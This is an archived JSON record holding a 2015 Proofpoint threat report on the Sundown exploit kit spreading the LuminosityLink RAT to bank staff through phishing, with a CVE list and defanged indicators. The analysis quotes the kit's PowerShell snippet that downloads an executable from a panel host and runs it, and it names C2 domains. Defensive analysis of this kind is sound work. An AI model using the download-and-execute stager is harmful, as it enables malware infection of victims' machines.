{
	"id": "6ebb1d79-e87c-4186-8a5f-d63676117445",
	"created_at": "2026-04-06T00:17:30.432209Z",
	"updated_at": "2026-04-10T13:11:48.468873Z",
	"deleted_at": null,
	"sha1_hash": "50faeb89cdb2033d5b9a41d81b317efb7505b17c",
	"title": "Sundown EK Spreads LuminosityLink RAT | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 378587,
	"plain_text": "Sundown EK Spreads LuminosityLink RAT | Proofpoint US\r\nBy June 25, 2015 Proofpoint Staff\r\nPublished: 2015-06-25 · Archived: 2026-04-05 21:25:13 UTC\r\nThe Sundown exploit kit is a recent addition to the field of EKs [1], and analysis indicates that it is still in development by\r\nits creator [2]. As it continues to evolve and develop, Proofpoint researchers have detected it distributing a new remote\r\naccess Trojan (RAT).\r\nThis campaign targeted recipients at large banks and financial services organizations. Proofpoint researchers observed both\r\nattachments and URLs being used by the campaign; one of the more widely distributed examples employed a “breaking\r\nnews” template and a malicious URL. (Fig. 1)\r\nFigure 1: Phishing email containing “breaking news” and malicious links.\r\nThe fake news update delivered by the phishing email is false but combines sensationalism with popular suspicion of banks\r\nto effectively entice recipients to click. However, in a departure from the targeting techniques we have described elsewhere,\r\nrather than connect to a TDS that checks for specific client attributes before pulling in the exploit kit, in this case the link\r\nconnects the client directly to the Sundown EK. Sundown does not attempt to distinguish between countries, IP addresses,\r\ncompanies, or other client attributes, and instead attempts to execute exploits on clients indiscriminately. Moreover, the\r\n“unsubscribe” and “report as spam” links in the phishing message also link to the Sundown EK. 
While it is not unusual to\r\nhave multiple malicious URLs in a single message, the fact that these link directly to the EK, rather than to a TDS or spam\r\nsite, only increases the risk posed by this message.\r\nThe exploits being served by Sundown in this campaign include the Adobe Flash zero-days that were detected on the Angler\r\nEK in early 2015 and reflect a preference for Flash Player exploits and broadly applicable Windows vulnerabilities. (Fig. 2)\r\nCVE | Platform\r\nCVE-2015-0311 | Adobe Flash Player through 13.0.0.262 and 14.x, 15.x, and 16.x through 16.0.0.287 on Windows and OS X and through 11.2.202.438 on Linux\r\nhttps://www.proofpoint.com/us/threat-insight/post/Light-After-Dark\r\nPage 1 of 3\n\nCVE-2015-0313 | Use-after-free vulnerability in Adobe Flash Player before 13.0.0.269 and 14.x through 16.x before 16.0.0.305 on Windows and OS X and before 11.2.202.442 on Linux\r\nCVE-2015-0359 | Double free vulnerability in Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux\r\nCVE-2014-0556 | Heap-based buffer overflow in Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK \u0026 Compiler before 15.0.0.249\r\nCVE-2014-6332 | .dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1\r\nCVE-2012-1876 | Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does not properly handle objects in memory\r\nFigure 2: Exploits observed in Sundown EK (Aditya K. 
Sood \u0026 Rohit Bansal [2])\r\nThe exploits observed in the Sundown EK changed significantly in a relatively short period, adding another Flash\r\nvulnerability (patched in April) and an Internet Explorer vulnerability from 2012. These changes demonstrate that the actors\r\nbehind the Sundown EK continue to adjust and refine their exploit combinations in order to achieve the best results.\r\nThe exploits are delivered in PHP and SWF files that include the code to exploit the targeted vulnerabilities. Many of the\r\nPHP files are encoded with the VBScript encoder (VBS to VBE). The structure of exploit-serving URLs is shown below; long\r\nURL and file names are used and may differ in other samples:\r\n[hxxp://\u003csundown_panel\u003e/ERFREERGYHIRYTUIYTUEIRHJTRJIHURJHRTRTIEUUEYREUI/lat45786547685457864375643875jhgfhf4\r\n[hxxp://\u003csundown_panel\u003e/ERFREERGYHIRYTUIYTUEIRHJTRJIHURJHRTRTIEUUEYREUI/1464875454kj5hgkj45h4j35f4j3f5hj35fg4\r\n[hxxp://\u003csundown_panel\u003e/ERFREERGYHIRYTUIYTUEIRHJTRJIHURJHRTRTIEUUEYREUI/311875648754y5tg4jkh5fg45hjf43hgj5f43\r\n[hxxp://\u003csundown_panel\u003e/ERFREERGYHIRYTUIYTUEIRHJTRJIHURJHRTRTIEUUEYREUI/17896968796549876986jhgkjhkg65hj5gf6\r\n[hxxp://\u003csundown_panel\u003e/ERFREERGYHIRYTUIYTUEIRHJTRJIHURJHRTRTIEUUEYREUI/145328452345324683274632yjetguyjkgfj\r\nOne of the PHP files is a VBScript file that utilizes PowerShell to download and execute the payload using code such as:\r\n(New-Object System.Net.WebClient).DownloadFile('[hxxp:// \u003csundown_panel\u003e/SDDS/domain.php?d=Service-3.exe]', $env:APPDATA + '\\EDWEDRFEDDF-3.exe');\r\n$val = $env:APPDATA + '\\EDWEDRFEDDF-3.exe';\r\nStart-Process $val;\r\nThe reliance on PowerShell limits Sundown’s ability to execute on Windows XP systems – a rare break for a platform that\r\ncontinues to be widely used despite no longer being supported by Microsoft.\r\nPrevious analyses have observed the Sundown EK delivering the Neutrino DDoS bot. 
In this campaign, Proofpoint\r\nresearchers detected a new payload: the LuminosityLink remote access Trojan (RAT). The stated purpose of\r\nLuminosityLink is ostensibly benign: \"LuminosityLink allows system administrators to manage a large amount of\r\ncomputers concurrently. Our product is ideal for business owners, educational institutions, and Windows system\r\nadministrators.\" (Fig. 3)\r\nFigure 3: LuminosityLink features described on product web site ([hxxps://luminosity[.]link/])\r\nAnalysis upon install, however, reveals a very aggressive key logger that injects its code into almost every running process on\r\nthe computer, and makes multiple attempts if injection does not initially succeed. This \"injection\" behavior is aggressive even by the\r\nstandard of the Zeus family: very few malware families exhibit such aggressive behavior, and it is particularly unusual to\r\nobserve this in key loggers, even commercial ones. We have observed LuminosityLink being used to download additional\r\npayloads. It is possible that the actors involved here are using LuminosityLink as a platform to collect information from the\r\nvictim, and using that information to decide whether to deploy more sophisticated malware at high-value targets. 
While it is\r\nnot unusual for adware and other questionable software to pass themselves off as legitimate tools, it is striking to see a piece\r\nof software with a set of obviously malicious functions marketed so actively and openly.\r\nThis unusual ploy becomes somewhat more intelligible in the context of the recent conviction and sentencing of the\r\nBlackshades RAT author and associates: by actively marketing their \"solution\" as a tool with legitimate business and\r\nadministrative uses, the LuminosityLink creators could be attempting to forestall legal action, although this argument is\r\ncertainly not helped by distributing the RAT via an exploit kit.\r\nThe recent rise of Sundown shows that the EK market continues to evolve in the void left by the collapse of the Blackhole\r\nEK, as malware creators experiment with different approaches to delivering exploits and challenge the dominance of\r\nsophisticated, high-value EKs such as Angler. This may also be a sign that the malicious macro campaigns that have\r\ndominated the threat landscape since late 2015 are beginning to play out and attackers are starting to look for other\r\ndelivery and masking techniques: time and additional observation will tell.\r\nIndicators of Compromise\r\nLuminosityLink C2 server URLs:\r\n[hxxp://emenike[.]no-ip-biz]\r\n[hxxp://serv[.]textme.pw]\r\nReferences\r\n1. http://malware.dontneedcoffee.com/2015/06/fast-look-at-sundown-ek.html\r\n2. https://www.virusbtn.com/virusbulletin/archive/2015/06/vb201506-Beta-BE\r\nSource: https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark"
	],
	"report_names": [
		"Light-After-Dark"
	],
	"threat_actors": [],
	"ts_created_at": 1775434650,
	"ts_updated_at": 1775826708,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/50faeb89cdb2033d5b9a41d81b317efb7505b17c.pdf",
		"text": "https://archive.orkl.eu/50faeb89cdb2033d5b9a41d81b317efb7505b17c.txt",
		"img": "https://archive.orkl.eu/50faeb89cdb2033d5b9a41d81b317efb7505b17c.jpg"
	}
}